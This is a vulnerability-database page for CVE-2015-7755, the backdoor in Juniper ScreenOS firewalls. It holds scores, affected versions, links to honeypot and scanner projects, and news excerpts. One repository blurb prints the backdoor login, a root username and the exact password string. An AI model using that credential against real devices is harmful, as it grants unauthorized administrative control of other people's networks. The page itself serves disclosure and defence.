Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
10
CVSSv2

CVE-2015-7755

Published: 19/12/2015 Updated: 07/12/2016
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 891
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Juniper

Vulnerability Summary

Juniper ScreenOS 6.2.0r15 up to and including 6.2.0r18, 6.3.0r12 prior to 6.3.0r12b, 6.3.0r13 prior to 6.3.0r13b, 6.3.0r14 prior to 6.3.0r14b, 6.3.0r15 prior to 6.3.0r15b, 6.3.0r16 prior to 6.3.0r16b, 6.3.0r17 prior to 6.3.0r17b, 6.3.0r18 prior to 6.3.0r18b, 6.3.0r19 prior to 6.3.0r19b, and 6.3.0r20 prior to 6.3.0r21 allows remote malicious users to obtain administrative access by entering an unspecified password during a (1) SSH or (2) TELNET session.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

juniper screenos 6.3.0

Github Repositories

https://github.com/armbues/netscreen_honeypot

NetScreen Honeypot SSH honeypot based on Cowrie with some modifications to look like a NetScreen device vulnerable to CVE-2015-7755 (backdoor password)

https://github.com/juliocesarfort/netscreen-shodan-scanner

A SHODAN/Censys + Paramiko scanner to check for backdoored Internet-facing Juniper ScreenOS devices

netscreen-backdoor-scannerpy A very simple SHODAN/Censys + Paramiko scanner to check for backdoored Internet-facing Juniper ScreenOS devices For more information about this issue see Rapid7's blog post: communityrapid7com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor With code from breakpoint-labscom/reconnais

https://github.com/cinno/CVE-2015-7755-POC

CVE-2015-7755-POC CVE-2015-7755 vulnerability detection using ssh to connect those vulnerable version: ScreenOS 620r15—620r18,630r12—630r20 (Juniper Networks) user: root passwd: <<< %s(un='%s') = %u

https://github.com/hdm/juniper-cve-2015-7755

Notes, binaries, and related information from analysis of the CVE-2015-7755 & CVE-2015-7756 issues within Juniper ScreenOS

Juniper CVE-2015-7755 & CVE-2015-7756 This repository contains notes, binaries, and related information from analysis of the CVE-2015-7755 & CVE-2015-7756 issues within Juniper ScreenOS For more information about these issues, please see the URLs below: forumsjunipernet/t5/Security-Incident-Response/Important-Announcement-about-ScreenOS/ba-p/285554 h

Recent Articles

Threat intelligence report for the telecommunications industry
Securelist • Kaspersky Lab • 22 Aug 2016

Download PDF The telecommunications industry keeps the world connected. Telecoms providers build, operate and manage the complex network infrastructures used for voice and data transmission – and they communicate and store vast amounts of sensitive data. This makes them a top target for cyber-attack. According to PwC’s Global State of Information Security, 2016, IT security incidents in the telecoms sector increased 45% in 2015 compared to the year before. Telecoms providers need to arm them...

Read more...
NASA, Dept of Defense, Commerce etc probed over use of backdoored Juniper kit
The Register • Chris Williams, Editor in Chief • 26 Jan 2016

Were firewalls up to date? Committee wants to know

A bunch of US government departments and agencies – from the military to NASA – are being grilled over their use of backdoored Juniper firewalls. The House of Representatives' Committee on Oversight and Government Reform fired off letters to top officials over the weekend, demanding to know if any of the dodgy NetScreen devices were used in federal systems. Juniper's ScreenOS software – the firmware that powers in its firewalls – was tampered with by mystery hackers a few years ago to in...

Read more...
Juniper 'fesses up to TWO attacks from 'unauthorised code'
The Register • Simon Sharwood • 20 Dec 2015

Networking biz silent on China dev centre as source of crooked code

Updated Juniper Networks has offered a more detailed description of the security issues resulting from its find of “unauthorised code” in ScreenOS, the software that powers its firewalls. The company's knowledge base article on the incident says: “The first issue allows unauthorized remote administrative access to the device over SSH or telnet. Exploitation of this vulnerability can lead to complete compromise of the affected system.” While the company points out that "upon exploitation ...

Read more...

References

CWE-287http://twitter.com/cryptoron/statuses/677900647560253442http://www.forbes.com/sites/thomasbrewster/2015/12/18/juniper-says-it-didnt-work-with-government-to-add-unauthorized-code-to-network-gear/http://www.wired.com/2015/12/juniper-networks-hidden-backdoors-show-the-risk-of-government-backdoors/https://github.com/hdm/juniper-cve-2015-7755http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713https://adamcaudill.com/2015/12/17/much-ado-about-juniper/https://forums.juniper.net/t5/Security-Incident-Response/Important-Announcement-about-ScreenOS/ba-p/285554http://arstechnica.com/security/2015/12/unauthorized-code-in-juniper-firewalls-decrypts-encrypted-vpn-traffic/http://www.securityfocus.com/bid/79626http://www.kb.cert.org/vuls/id/640184http://www.securitytracker.com/id/1034489https://nvd.nist.govhttps://github.com/armbues/netscreen_honeypothttps://github.com/juliocesarfort/netscreen-shodan-scannerhttps://www.theregister.co.uk/2016/01/26/juniper_us_government/https://www.kb.cert.org/vuls/id/640184
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-4040privilege escalationCVE-2024-4112CVE-2024-32872man-in-the-middleCVE-2024-32788bypassCVE-2024-3400CVE-2024-28976
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook